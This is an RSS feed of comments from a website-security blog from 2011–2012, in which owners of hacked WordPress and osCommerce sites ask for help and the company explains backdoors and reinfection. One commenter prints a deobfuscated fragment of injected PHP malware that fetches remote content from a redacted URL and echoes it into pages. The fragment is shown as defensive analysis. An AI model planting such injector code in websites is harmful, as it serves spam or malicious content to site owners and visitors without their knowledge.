<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments for We Watch Your Website - so you don&#039;t have to!</title>
	<atom:link href="http://wewatchyourwebsite.com/wordpress/comments/feed/" rel="self" type="application/rss+xml" />
	<link>http://wewatchyourwebsite.com/wordpress</link>
	<description>Website Security</description>
	<lastBuildDate>Mon, 16 Apr 2012 17:46:24 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
	<item>
		<title>Comment on Spam links in WordPress infected websites by Aaron Parr</title>
		<link>http://wewatchyourwebsite.com/wordpress/2011/10/spam-links-in-wordpress-infected-websites/#comment-1995</link>
		<dc:creator>Aaron Parr</dc:creator>
		<pubDate>Mon, 16 Apr 2012 17:46:24 +0000</pubDate>
		<guid isPermaLink="false">http://wewatchyourwebsite.com/wordpress/?p=764#comment-1995</guid>
		<description>I foolishly left the door open for this to happen to my website. While playing around with my wordpress content folder I had set permissions to 777, but neglected to change it back.

Each of my themes were infected as well as a number of files further up stream of it in the wordpress directory.  Oddly not one .htaccess file is infected nor do I have any thumb.db files or the like.

I&#039;ve since cleaned up every infected file I could find (used a regex powered search on every file). But am wondering why i am not finding the source to the problem. Could it be that this was purely opportunistic because I left myself open?

Anyway, permissions are reset to be less permissive and i changed my user password. will change all the other passwords (FTP etc...) soon enough.</description>
		<content:encoded><![CDATA[<p>I foolishly left the door open for this to happen to my website. While playing around with my wordpress content folder I had set permissions to 777, but neglected to change it back.</p>
<p>Each of my themes were infected as well as a number of files further up stream of it in the wordpress directory.  Oddly not one .htaccess file is infected nor do I have any thumb.db files or the like.</p>
<p>I&#8217;ve since cleaned up every infected file I could find (used a regex powered search on every file). But am wondering why i am not finding the source to the problem. Could it be that this was purely opportunistic because I left myself open?</p>
<p>Anyway, permissions are reset to be less permissive and i changed my user password. will change all the other passwords (FTP etc&#8230;) soon enough.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on About by EC</title>
		<link>http://wewatchyourwebsite.com/wordpress/about/#comment-1929</link>
		<dc:creator>EC</dc:creator>
		<pubDate>Mon, 02 Apr 2012 13:14:28 +0000</pubDate>
		<guid isPermaLink="false">http://thissitemayharmyourcomputer.com/wewatchyourwebsite/wordpress/?page_id=2#comment-1929</guid>
		<description>ajaxfilemanager is the exploit it appears.</description>
		<content:encoded><![CDATA[<p>ajaxfilemanager is the exploit it appears.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on WordPress websites infected through outdated contact-form-7 plugin by Thomas J. Raef</title>
		<link>http://wewatchyourwebsite.com/wordpress/2011/11/wordpress-websites-infected-through-outdated-contact-form-7-plugin/#comment-1724</link>
		<dc:creator>Thomas J. Raef</dc:creator>
		<pubDate>Sun, 04 Mar 2012 12:59:55 +0000</pubDate>
		<guid isPermaLink="false">http://wewatchyourwebsite.com/wordpress/?p=793#comment-1724</guid>
		<description>If you just updated the version and plugins, then they could have infected your website when you were at older versions. We&#039;ve been seeing many sites infected via stolen passwords. If you have a virus on your computer and you login to your website (wp-admin), then the virus could have stolen the password then logged in as you and infected your website.

In order to get this clean, you will have to search for all backdoors and remove them. There is no searching for just a few strings. It is now an exhaustive search.

What plugins do you have?</description>
		<content:encoded><![CDATA[<p>If you just updated the version and plugins, then they could have infected your website when you were at older versions. We&#8217;ve been seeing many sites infected via stolen passwords. If you have a virus on your computer and you login to your website (wp-admin), then the virus could have stolen the password then logged in as you and infected your website.</p>
<p>In order to get this clean, you will have to search for all backdoors and remove them. There is no searching for just a few strings. It is now an exhaustive search.</p>
<p>What plugins do you have?</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on WordPress websites infected through outdated contact-form-7 plugin by sreedhar</title>
		<link>http://wewatchyourwebsite.com/wordpress/2011/11/wordpress-websites-infected-through-outdated-contact-form-7-plugin/#comment-1713</link>
		<dc:creator>sreedhar</dc:creator>
		<pubDate>Fri, 02 Mar 2012 08:53:59 +0000</pubDate>
		<guid isPermaLink="false">http://wewatchyourwebsite.com/wordpress/?p=793#comment-1713</guid>
		<description>my site got hacked by the below script

 
im having latest versions and latest plugins even though my site got hacked can u tell me the process how they hacked this one</description>
		<content:encoded><![CDATA[<p>my site got hacked by the below script</p>
<p>im having latest versions and latest plugins even though my site got hacked can u tell me the process how they hacked this one</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Securing osCommerce by MickeyRoush</title>
		<link>http://wewatchyourwebsite.com/wordpress/2010/12/securing-oscommerce/#comment-1710</link>
		<dc:creator>MickeyRoush</dc:creator>
		<pubDate>Thu, 01 Mar 2012 12:57:29 +0000</pubDate>
		<guid isPermaLink="false">http://wewatchyourwebsite.com/wordpress/?p=477#comment-1710</guid>
		<description>You should block more than just .php extensions in the images directory. There are many extensions that can be executed in php. But instead of blocking extensions like that, consider allowing only specific extensions instead. So block everything except a few extensions like, .jpg, .jpeg, .png, .gif.</description>
		<content:encoded><![CDATA[<p>You should block more than just .php extensions in the images directory. There are many extensions that can be executed in php. But instead of blocking extensions like that, consider allowing only specific extensions instead. So block everything except a few extensions like, .jpg, .jpeg, .png, .gif.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on WordPress websites infected through outdated contact-form-7 plugin by Jurij</title>
		<link>http://wewatchyourwebsite.com/wordpress/2011/11/wordpress-websites-infected-through-outdated-contact-form-7-plugin/#comment-1517</link>
		<dc:creator>Jurij</dc:creator>
		<pubDate>Mon, 23 Jan 2012 22:26:33 +0000</pubDate>
		<guid isPermaLink="false">http://wewatchyourwebsite.com/wordpress/?p=793#comment-1517</guid>
		<description>I managed to decypher the main part of the code. The code is pretty obfuscated, with many base64_decodes, strrev, implode/explode, and nasty variable names which gives you quite a headache. Basically it goes to some site (I will need some time to find out the URL) and print the contents by echo. Here is the main part

&lt;code&gt;@setcookie(&quot;stats&quot;,md5(&quot;stats&quot;),time()+10800); 
$evalsssgqulVBTkZLAch =@file_get_contents(&quot;http://??/in.php?i= &amp;b=???&amp;h=&quot;); //I still have to find out the exact URL.
if (strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];
echo $evalsssgqulVBTkZLAch;&lt;/code&gt;

The code also creates a cookie by the name &quot;stats&quot;, which is used to set the URL (domain and parameters).</description>
		<content:encoded><![CDATA[<p>I managed to decypher the main part of the code. The code is pretty obfuscated, with many base64_decodes, strrev, implode/explode, and nasty variable names which gives you quite a headache. Basically it goes to some site (I will need some time to find out the URL) and print the contents by echo. Here is the main part</p>
<p><code>@setcookie("stats",md5("stats"),time()+10800);<br />
$evalsssgqulVBTkZLAch =@file_get_contents("http://??/in.php?i= &amp;b=???&amp;h="); //I still have to find out the exact URL.<br />
if (strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];<br />
echo $evalsssgqulVBTkZLAch;</code></p>
<p>The code also creates a cookie by the name &#8220;stats&#8221;, which is used to set the URL (domain and parameters).</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Spam links in WordPress infected websites by Thomas J. Raef</title>
		<link>http://wewatchyourwebsite.com/wordpress/2011/10/spam-links-in-wordpress-infected-websites/#comment-1505</link>
		<dc:creator>Thomas J. Raef</dc:creator>
		<pubDate>Sat, 21 Jan 2012 13:01:30 +0000</pubDate>
		<guid isPermaLink="false">http://wewatchyourwebsite.com/wordpress/?p=764#comment-1505</guid>
		<description>Yes the hackers can infect other websites on the same hosting account.

This happens in a number of ways.

First, often times a hacker will upload a &quot;backdoor&quot; script. This backdoor provides them with a filemanager like view. So everything you can see in your filemanager from your control panel, they have access to as well.

Second, when their (the hackers) script runs to infect files, it seeks out files in all accessible folders.

Quite often we see where the hackers will find a point of entry on one website in a hosting account, and they won&#039;t infect that site but they will infect one of the other sites. They do this because they want you to spend all your time, energy and attention on the one that is infected. So you get it cleaned and then they re-infect it again and again.

Then they might infect one of the other sites in that hosting account and play the same game.

This is why we insist on cleaning all the websites in a hosting account and why are prices are lower on additional websites. Until you scan, clean and analyze all the websites in a hosting account, you&#039;ll never know if you&#039;re really clean.</description>
		<content:encoded><![CDATA[<p>Yes the hackers can infect other websites on the same hosting account.</p>
<p>This happens in a number of ways.</p>
<p>First, often times a hacker will upload a &#8220;backdoor&#8221; script. This backdoor provides them with a filemanager like view. So everything you can see in your filemanager from your control panel, they have access to as well.</p>
<p>Second, when their (the hackers) script runs to infect files, it seeks out files in all accessible folders.</p>
<p>Quite often we see where the hackers will find a point of entry on one website in a hosting account, and they won&#8217;t infect that site but they will infect one of the other sites. They do this because they want you to spend all your time, energy and attention on the one that is infected. So you get it cleaned and then they re-infect it again and again.</p>
<p>Then they might infect one of the other sites in that hosting account and play the same game.</p>
<p>This is why we insist on cleaning all the websites in a hosting account and why are prices are lower on additional websites. Until you scan, clean and analyze all the websites in a hosting account, you&#8217;ll never know if you&#8217;re really clean.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Spam links in WordPress infected websites by Sebastian</title>
		<link>http://wewatchyourwebsite.com/wordpress/2011/10/spam-links-in-wordpress-infected-websites/#comment-1503</link>
		<dc:creator>Sebastian</dc:creator>
		<pubDate>Sat, 21 Jan 2012 12:15:03 +0000</pubDate>
		<guid isPermaLink="false">http://wewatchyourwebsite.com/wordpress/?p=764#comment-1503</guid>
		<description>Hi. I was having attacks  on all Wordpress sites under the same hosting account. Some were using this timthumb.php files, some don&#039;t. there were infected these files:
wp-blog-header.php
index.php
and in all installed themes folders
in all installedthemes
wp-content/themes/theme-name/footer.php
wp-content/themes/theme-name/header.php
wp-content/themes/theme-name/index.php
wp-content/themes/theme-name/sidebar-footer.php

There are no htacces infected files attached.  

Do you think that is possible that they can enter from one vulnerable website to hack the other websites from the same hosting account?

Thanks!</description>
		<content:encoded><![CDATA[<p>Hi. I was having attacks  on all WordPress sites under the same hosting account. Some were using this timthumb.php files, some don&#8217;t. there were infected these files:<br />
wp-blog-header.php<br />
index.php<br />
and in all installed themes folders<br />
in all installedthemes<br />
wp-content/themes/theme-name/footer.php<br />
wp-content/themes/theme-name/header.php<br />
wp-content/themes/theme-name/index.php<br />
wp-content/themes/theme-name/sidebar-footer.php</p>
<p>There are no htacces infected files attached.  </p>
<p>Do you think that is possible that they can enter from one vulnerable website to hack the other websites from the same hosting account?</p>
<p>Thanks!</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Securing osCommerce by admin</title>
		<link>http://wewatchyourwebsite.com/wordpress/2010/12/securing-oscommerce/#comment-1394</link>
		<dc:creator>admin</dc:creator>
		<pubDate>Mon, 26 Dec 2011 14:02:58 +0000</pubDate>
		<guid isPermaLink="false">http://wewatchyourwebsite.com/wordpress/?p=477#comment-1394</guid>
		<description>You have to find the point of entry for the hackers and remove it.

If your site is built with osCommerce, there are a number of steps to follow to secure it.

Until you find that point of entry and remove it, your site will continually get infected.

Let us know if you need help.</description>
		<content:encoded><![CDATA[<p>You have to find the point of entry for the hackers and remove it.</p>
<p>If your site is built with osCommerce, there are a number of steps to follow to secure it.</p>
<p>Until you find that point of entry and remove it, your site will continually get infected.</p>
<p>Let us know if you need help.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Securing osCommerce by Rev. Titus K. Oyeyemi</title>
		<link>http://wewatchyourwebsite.com/wordpress/2010/12/securing-oscommerce/#comment-1352</link>
		<dc:creator>Rev. Titus K. Oyeyemi</dc:creator>
		<pubDate>Mon, 19 Dec 2011 08:09:20 +0000</pubDate>
		<guid isPermaLink="false">http://wewatchyourwebsite.com/wordpress/?p=477#comment-1352</guid>
		<description>My organization website began to be constantly hacked in the last few months by V!RUS.DZ. The hackers says &quot;We are Algerian Hacker&#039;s (DZ).&quot; It went on to say &quot;Fuck USA - Israel - France - Danemark. (email removed by moderator). The hacker&#039;s Fan Page of Facebook is http://Facebook.com/Evil.Dz. 

The designer and host of my organization&#039;s website has cleaned the website several times. But V!RUS.DZ keeps coming back. Our website is designed for teaching peace education. We are working with a large number of kids in an out of school to cultivate new lifestyle of peaceful co-existence,

I can understand why we are hated as peacemakers, peacebuilders, and peace teachers! We need our website for the work we do! We can we do to stop these hackers from Algeria!</description>
		<content:encoded><![CDATA[<p>My organization website began to be constantly hacked in the last few months by V!RUS.DZ. The hackers says &#8220;We are Algerian Hacker&#8217;s (DZ).&#8221; It went on to say &#8220;Fuck USA &#8211; Israel &#8211; France &#8211; Danemark. (email removed by moderator). The hacker&#8217;s Fan Page of Facebook is <a href="http://Facebook.com/Evil.Dz" rel="nofollow">http://Facebook.com/Evil.Dz</a>. </p>
<p>The designer and host of my organization&#8217;s website has cleaned the website several times. But V!RUS.DZ keeps coming back. Our website is designed for teaching peace education. We are working with a large number of kids in an out of school to cultivate new lifestyle of peaceful co-existence,</p>
<p>I can understand why we are hated as peacemakers, peacebuilders, and peace teachers! We need our website for the work we do! We can we do to stop these hackers from Algeria!</p>
]]></content:encoded>
	</item>
</channel>
</rss>

